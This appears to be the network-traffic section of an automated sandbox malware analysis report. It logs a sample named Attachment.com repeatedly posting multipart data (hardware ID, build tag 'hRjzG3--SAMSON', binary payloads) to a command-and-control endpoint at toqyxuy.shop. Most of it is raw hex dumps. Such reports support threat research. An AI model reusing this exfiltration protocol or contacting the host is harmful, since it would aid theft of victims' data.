                                                                                                                                2024-12-08 00:46:05 UTC1369INData Raw: 78 4b 34 42 4c 4a 6a 69 6b 49 6f 4f 42 69 55 75 65 41 52 42 74 39 67 37 57 67 38 52 30 6c 7a 59 2b 74 34 38 70 6d 38 42 38 44 79 41 37 4b 42 63 43 42 4f 68 79 48 39 57 51 4e 70 35 41 45 44 54 47 57 74 2b 57 70 55 57 69 50 78 61 66 2b 6a 6a 61 33 4c 52 58 45 53 74 68 47 33 63 67 35 46 64 57 2f 49 67 79 71 6a 51 59 4e 50 59 57 36 35 4b 4a 61 4c 73 65 45 6f 2b 50 4e 61 2f 45 64 41 73 67 41 77 41 44 4f 68 6a 4d 66 6b 65 46 6b 51 2b 6e 66 44 52 70 39 33 50 6e 53 70 46 4d 68 77 6f 4f 74 38 4f 5a 66 74 77 4e 4d 33 55 72 41 42 49 54 51 66 68 32 65 37 32 34 47 72 35 6f 4c 43 6a 65 4d 74 75 2b 37 58 43 66 49 67 71 76 72 77 57 44 79 45 68 44 44 41 63 77 41 7a 59 59 34 57 64 75 6e 5a 52 76 6e 78 30 6f 30 50 6f 71 79 38 61 5a 65 4a 49 47 61 37 76 2b 4f 61 66 74 63 57
                                                                                                                                Data Ascii: xK4BLJjikIoOBiUueARBt9g7Wg8R0lzY+t48pm8B8DyA7KBcCBOhyH9WQNp5AEDTGWt+WpUWiPxaf+jja3LRXESthG3cg5FdW/IgyqjQYNPYW65KJaLseEo+PNa/EdAsgAwADOhjMfkeFkQ+nfDRp93PnSpFMhwoOt8OZftwNM3UrABITQfh2e724Gr5oLCjeMtu+7XCfIgqvrwWDyEhDDAcwAzYY4WdunZRvnx0o0Poqy8aZeJIGa7v+OaftcW
                                                                                                                                2024-12-08 00:46:05 UTC1369INData Raw: 65 77 34 38 78 57 37 7a 67 65 51 4b 74 6e 41 45 4f 66 5a 76 33 2b 65 6c 61 4a 49 48 64 34 4f 76 43 59 2f 4d 4f 44 73 51 4b 7a 67 2f 4f 6d 6a 45 57 6d 4f 52 69 42 72 57 65 47 41 30 32 67 62 72 6b 70 6c 49 6b 79 59 2f 67 71 49 35 70 37 31 78 61 68 43 62 45 47 63 37 4b 47 51 4f 44 34 47 34 53 72 4a 49 47 51 69 4c 4b 6f 4b 43 75 55 57 69 5a 78 61 44 6e 77 33 7a 79 48 51 6a 4f 42 38 38 48 77 59 30 78 48 5a 48 73 62 42 47 70 6b 41 6f 45 4e 6f 57 38 34 36 4a 58 4a 73 69 58 34 4b 69 4f 61 65 39 63 57 6f 51 67 33 41 6e 4a 68 48 77 33 6e 76 46 6c 51 59 61 52 41 51 55 78 6b 76 6e 2f 35 30 52 6f 78 6f 6e 67 76 6f 35 6e 2b 52 41 42 77 77 4c 50 44 63 53 44 50 68 61 66 36 57 55 52 72 5a 4d 41 45 44 4b 48 74 4f 53 6b 56 79 33 49 6c 36 58 76 79 43 36 35 58 41 58 63 53 70
                                                                                                                                Data Ascii: ew48xW7zgeQKtnAEOfZv3+elaJIHd4OvCY/MODsQKzg/OmjEWmORiBrWeGA02gbrkplIkyY/gqI5p71xahCbEGc7KGQOD4G4SrJIGQiLKoKCuUWiZxaDnw3zyHQjOB88HwY0xHZHsbBGpkAoENoW846JXJsiX4KiOae9cWoQg3AnJhHw3nvFlQYaRAQUxkvn/50Roxongvo5n+RABwwLPDcSDPhaf6WURrZMAEDKHtOSkVy3Il6XvyC65XAXcSp
                                                                                                                                2024-12-08 00:46:05 UTC1369INData Raw: 4e 42 71 5a 38 57 38 4d 35 34 42 45 47 33 32 44 74 61 44 78 48 54 72 54 68 61 76 6d 79 57 44 6c 48 51 72 4c 41 4d 63 4f 7a 34 49 39 45 4a 48 70 61 77 57 6d 6b 67 73 44 50 59 47 35 36 62 74 51 61 49 2f 46 70 2f 36 4f 4e 72 63 72 44 73 38 37 78 42 36 45 6c 33 41 41 31 65 42 75 51 2f 2f 66 43 78 41 77 6a 4c 33 67 70 46 73 6a 77 49 53 6a 35 73 35 74 39 78 6b 4a 79 77 7a 41 42 63 36 42 4e 77 75 64 34 33 41 44 71 35 74 4b 54 48 32 44 6f 61 44 78 48 52 6a 43 6a 71 7a 6d 77 33 75 33 41 30 7a 64 53 73 41 45 68 4e 42 2b 45 5a 37 73 5a 41 69 6b 6e 41 51 4a 4e 34 75 32 36 71 39 62 49 4d 53 46 72 4f 62 4c 61 50 4d 59 44 4d 4d 45 79 67 6e 57 69 7a 64 5a 32 36 64 6c 47 2b 66 48 53 69 49 32 6b 72 7a 6e 76 78 38 64 77 6f 75 75 34 64 67 75 36 43 4e 4d 68 41 75 48 55 50 32
                                                                                                                                Data Ascii: NBqZ8W8M54BEG32DtaDxHTrThavmyWDlHQrLAMcOz4I9EJHpawWmkgsDPYG56btQaI/Fp/6ONrcrDs87xB6El3AA1eBuQ//fCxAwjL3gpFsjwISj5s5t9xkJywzABc6BNwud43ADq5tKTH2DoaDxHRjCjqzmw3u3A0zdSsAEhNB+EZ7sZAiknAQJN4u26q9bIMSFrObLaPMYDMMEygnWizdZ26dlG+fHSiI2krznvx8dwouu4dgu6CNMhAuHUP2
                                                                                                                                2024-12-08 00:46:05 UTC1369INData Raw: 36 64 36 51 2f 2f 66 50 77 45 7a 69 72 37 32 75 42 41 49 79 6f 6d 6a 36 73 39 70 74 31 4a 43 77 6b 71 66 57 34 72 49 4f 67 6a 56 76 7a 4a 52 2f 4d 70 5a 56 57 33 57 70 71 36 77 48 54 36 42 33 66 4b 6f 6a 6e 79 33 52 45 4b 44 43 64 55 61 77 6f 73 6f 47 74 4c 5a 58 41 4b 71 6b 45 59 4d 4e 6f 53 2b 38 4c 39 47 5a 4d 6d 47 75 76 7a 77 55 4e 77 51 42 4d 4d 51 77 41 37 69 71 48 35 58 31 65 67 69 57 35 37 66 51 6b 49 43 79 76 6e 34 36 51 56 6f 39 49 61 75 36 4d 6c 34 35 6c 45 71 35 7a 44 39 53 75 69 50 4b 31 75 68 34 48 49 53 72 4a 49 47 51 6e 50 45 76 36 44 78 44 57 61 42 67 62 47 6d 6c 6a 36 6c 52 31 65 58 58 5a 64 61 32 38 59 6e 57 59 4f 6e 4f 6c 48 70 33 78 68 43 5a 63 54 2b 34 37 74 50 4c 73 4b 54 6f 36 48 77 55 4e 41 53 42 63 55 63 31 78 2f 4c 74 67 41 4d
                                                                                                                                Data Ascii: 6d6Q//fPwEzir72uBAIyomj6s9pt1JCwkqfW4rIOgjVvzJR/MpZVW3Wpq6wHT6B3fKojny3REKDCdUawosoGtLZXAKqkEYMNoS+8L9GZMmGuvzwUNwQBMMQwA7iqH5X1egiW57fQkICyvn46QVo9Iau6Ml45lEq5zD9SuiPK1uh4HISrJIGQnPEv6DxDWaBgbGmlj6lR1eXXZda28YnWYOnOlHp3xhCZcT+47tPLsKTo6HwUNASBcUc1x/LtgAM
                                                                                                                                2024-12-08 00:46:05 UTC1369INData Raw: 32 43 6b 67 63 48 4d 34 4f 48 33 6f 68 58 4f 4d 79 4b 70 36 54 75 61 65 45 66 50 50 6f 39 31 67 2f 55 79 68 67 61 67 2b 51 69 54 65 65 48 53 6c 70 39 70 62 50 77 70 46 49 76 67 36 57 6e 38 4d 30 75 75 56 77 47 68 46 4b 48 4c 63 6d 46 4f 78 65 53 70 55 4d 4a 74 35 49 46 42 58 2b 6b 76 76 61 71 48 57 61 42 69 65 43 2b 6a 6d 2f 39 44 41 2f 4c 44 59 73 50 33 6f 39 2b 56 39 58 70 49 6c 76 6e 6e 67 41 53 4d 49 75 2b 72 4b 39 54 4a 6f 47 61 37 76 2b 4f 65 4c 64 45 55 59 70 4b 31 55 69 63 79 48 6b 61 68 2f 56 6b 41 4c 47 63 54 54 77 44 71 61 76 6e 75 56 35 71 38 49 69 6b 38 4e 74 74 35 78 73 38 2b 69 66 56 44 39 53 4c 66 43 69 44 35 47 49 4e 6f 4e 39 45 51 69 58 45 34 61 43 45 54 79 2f 52 68 75 43 6f 6a 6d 4b 33 52 45 4c 4a 47 4d 41 59 78 38 51 35 41 35 4b 6e 66
                                                                                                                                Data Ascii: 2CkgcHM4OH3ohXOMyKp6TuaeEfPPo91g/Uyhgag+QiTeeHSlp9pbPwpFIvg6Wn8M0uuVwGhFKHLcmFOxeSpUMJt5IFBX+kvvaqHWaBieC+jm/9DA/LDYsP3o9+V9XpIlvnngASMIu+rK9TJoGa7v+OeLdEUYpK1UicyHkah/VkALGcTTwDqavnuV5q8Iik8Ntt5xs8+ifVD9SLfCiD5GINoN9EQiXE4aCETy/RhuCojmK3RELJGMAYx8Q5A5Knf


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                2192.168.2.449885104.21.36.514437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:07 UTC279OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=1RAEKZ8988RAOBI86KT
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 18170
                                                                                                                                Host: toqyxuy.shop
                                                                                                                                2024-12-08 00:46:07 UTC15331OUTData Raw: 2d 2d 31 52 41 45 4b 5a 38 39 38 38 52 41 4f 42 49 38 36 4b 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 43 46 31 34 46 44 41 37 37 31 39 38 36 33 34 30 32 32 35 42 44 35 41 46 32 39 45 35 38 0d 0a 2d 2d 31 52 41 45 4b 5a 38 39 38 38 52 41 4f 42 49 38 36 4b 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 31 52 41 45 4b 5a 38 39 38 38 52 41 4f 42 49 38 36 4b 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 53 41
                                                                                                                                Data Ascii: --1RAEKZ8988RAOBI86KTContent-Disposition: form-data; name="hwid"559CF14FDA771986340225BD5AF29E58--1RAEKZ8988RAOBI86KTContent-Disposition: form-data; name="pid"2--1RAEKZ8988RAOBI86KTContent-Disposition: form-data; name="lid"hRjzG3--SA
                                                                                                                                2024-12-08 00:46:07 UTC2839OUTData Raw: d3 2c 95 40 cc 78 a8 6a 87 a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed
                                                                                                                                Data Ascii: ,@xjf5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)py
                                                                                                                                2024-12-08 00:46:07 UTC1012INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:07 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=vt0ke31dt3q6gdoc7a0rgtbiq8; expires=Wed, 02-Apr-2025 18:32:46 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=90rkAbY7wTHX8oO0abNKWRn%2Fig1KIg93SzifzQHae1%2FxI0TgJSLkQP5fnfLXJuVsZWabsUZr5Oizq9jXNsZSLjGy1H6liBnp8C%2BpucljfYDlBU%2FqiT6DMhtduLYLplc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bc8ed9c619aa-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1827&min_rtt=1825&rtt_var=689&sent=12&recv=23&lost=0&retrans=0&sent_bytes=2827&recv_bytes=19129&delivery_rate=1582655&cwnd=32&unsent_bytes=0&cid=64713f44693340cf&ts=947&x=0"
                                                                                                                                2024-12-08 00:46:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                Data Ascii: fok 8.46.123.228
                                                                                                                                2024-12-08 00:46:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                3192.168.2.449891104.21.36.514437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:09 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=BMUZTTW8QX03778CNVL
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 8791
                                                                                                                                Host: toqyxuy.shop
                                                                                                                                2024-12-08 00:46:09 UTC8791OUTData Raw: 2d 2d 42 4d 55 5a 54 54 57 38 51 58 30 33 37 37 38 43 4e 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 43 46 31 34 46 44 41 37 37 31 39 38 36 33 34 30 32 32 35 42 44 35 41 46 32 39 45 35 38 0d 0a 2d 2d 42 4d 55 5a 54 54 57 38 51 58 30 33 37 37 38 43 4e 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 42 4d 55 5a 54 54 57 38 51 58 30 33 37 37 38 43 4e 56 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 53 41
                                                                                                                                Data Ascii: --BMUZTTW8QX03778CNVLContent-Disposition: form-data; name="hwid"559CF14FDA771986340225BD5AF29E58--BMUZTTW8QX03778CNVLContent-Disposition: form-data; name="pid"2--BMUZTTW8QX03778CNVLContent-Disposition: form-data; name="lid"hRjzG3--SA
                                                                                                                                2024-12-08 00:46:10 UTC1009INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:09 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=6v3vc80r98d0jcugrfhtrhv27v; expires=Wed, 02-Apr-2025 18:32:48 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iS3RX25VH7L97Q2ye8GvTjaM1EUNor%2BJ%2FapmvmCnSQ7Ke%2BRoBNw55QaJeURo0a0ByhcFUxwi5y3T6dzImvmI92dBszGT6Q7NUZuNgtZFvaFkLxDk864mSACIqWeYcrg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bc9c7bf11a48-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1887&min_rtt=1873&rtt_var=712&sent=9&recv=13&lost=0&retrans=0&sent_bytes=2828&recv_bytes=9727&delivery_rate=1558996&cwnd=156&unsent_bytes=0&cid=16f974d82e11a0e2&ts=902&x=0"
                                                                                                                                2024-12-08 00:46:10 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                Data Ascii: fok 8.46.123.228
                                                                                                                                2024-12-08 00:46:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                4192.168.2.449897104.21.36.514437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:11 UTC276OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=HC0296BYR822J2FH
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 20426
                                                                                                                                Host: toqyxuy.shop
                                                                                                                                2024-12-08 00:46:11 UTC15331OUTData Raw: 2d 2d 48 43 30 32 39 36 42 59 52 38 32 32 4a 32 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 43 46 31 34 46 44 41 37 37 31 39 38 36 33 34 30 32 32 35 42 44 35 41 46 32 39 45 35 38 0d 0a 2d 2d 48 43 30 32 39 36 42 59 52 38 32 32 4a 32 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 48 43 30 32 39 36 42 59 52 38 32 32 4a 32 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 53 41 4d 53 4f 4e 0d 0a 2d 2d 48
                                                                                                                                Data Ascii: --HC0296BYR822J2FHContent-Disposition: form-data; name="hwid"559CF14FDA771986340225BD5AF29E58--HC0296BYR822J2FHContent-Disposition: form-data; name="pid"3--HC0296BYR822J2FHContent-Disposition: form-data; name="lid"hRjzG3--SAMSON--H
                                                                                                                                2024-12-08 00:46:11 UTC5095OUTData Raw: 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00
                                                                                                                                Data Ascii: M?lrQMn 64F6(X&7~`aO
                                                                                                                                2024-12-08 00:46:12 UTC1016INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:12 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=4rec9koamk0vcindk45s3db198; expires=Wed, 02-Apr-2025 18:32:51 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLkUCMs3EG0bImjWaYvq9X6lEcY0s9KoDppU4hgY%2FFVydrBaEggaTeXePtpYQlGA24OMLigSm%2Fi1FhjcqnjoPOZY9Q4qaWVhHVvUFisnPoTwOX%2Fzx%2B%2BJYaFQezIv5Nc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bcab7bea0f90-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1528&min_rtt=1522&rtt_var=583&sent=17&recv=26&lost=0&retrans=0&sent_bytes=2827&recv_bytes=21382&delivery_rate=1856325&cwnd=109&unsent_bytes=0&cid=cd447351b6f29d0b&ts=1284&x=0"
                                                                                                                                2024-12-08 00:46:12 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                Data Ascii: fok 8.46.123.228
                                                                                                                                2024-12-08 00:46:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                5192.168.2.449902104.21.36.514437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:13 UTC270OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=KSHMGZNY7X7
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 5397
                                                                                                                                Host: toqyxuy.shop
                                                                                                                                2024-12-08 00:46:13 UTC5397OUTData Raw: 2d 2d 4b 53 48 4d 47 5a 4e 59 37 58 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 35 39 43 46 31 34 46 44 41 37 37 31 39 38 36 33 34 30 32 32 35 42 44 35 41 46 32 39 45 35 38 0d 0a 2d 2d 4b 53 48 4d 47 5a 4e 59 37 58 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 53 48 4d 47 5a 4e 59 37 58 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 53 41 4d 53 4f 4e 0d 0a 2d 2d 4b 53 48 4d 47 5a 4e 59 37 58 37 0d 0a 43 6f 6e
                                                                                                                                Data Ascii: --KSHMGZNY7X7Content-Disposition: form-data; name="hwid"559CF14FDA771986340225BD5AF29E58--KSHMGZNY7X7Content-Disposition: form-data; name="pid"1--KSHMGZNY7X7Content-Disposition: form-data; name="lid"hRjzG3--SAMSON--KSHMGZNY7X7Con
                                                                                                                                2024-12-08 00:46:14 UTC1010INHTTP/1.1 200 OK
                                                                                                                                Date: Sun, 08 Dec 2024 00:46:14 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                Set-Cookie: PHPSESSID=t4bjrciptvbt8oriankkfqga77; expires=Wed, 02-Apr-2025 18:32:53 GMT; Max-Age=9999999; path=/
                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x4MEiz8NbwjMmuxRjOy4WGNwFKL9Y6RLWcNZRLwUeumrXtSQsU%2BQts%2FEJ4xoJHaqYqiR2eyweUqP86nSi9B8lzOg%2B5Xpu1QzIQOaHfrd3JLmNMNUbTBjXH9vxhpiTBQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8ee8bcba5c594332-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1580&min_rtt=1575&rtt_var=602&sent=7&recv=11&lost=0&retrans=0&sent_bytes=2827&recv_bytes=6303&delivery_rate=1802469&cwnd=113&unsent_bytes=0&cid=7ce69cc840a7c83b&ts=1016&x=0"
                                                                                                                                2024-12-08 00:46:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                                                                Data Ascii: fok 8.46.123.228
                                                                                                                                2024-12-08 00:46:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                6192.168.2.449908104.21.36.514437924C:\Users\user\AppData\Local\Temp\189943\Attachment.com
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-08 00:46:16 UTC273OUTPOST /api HTTP/1.1
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Content-Type: multipart/form-data; boundary=KU5XQ1LN50NAPM
                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                Content-Length: 1219
                                                                                                                                Host: toqyxuy.shop
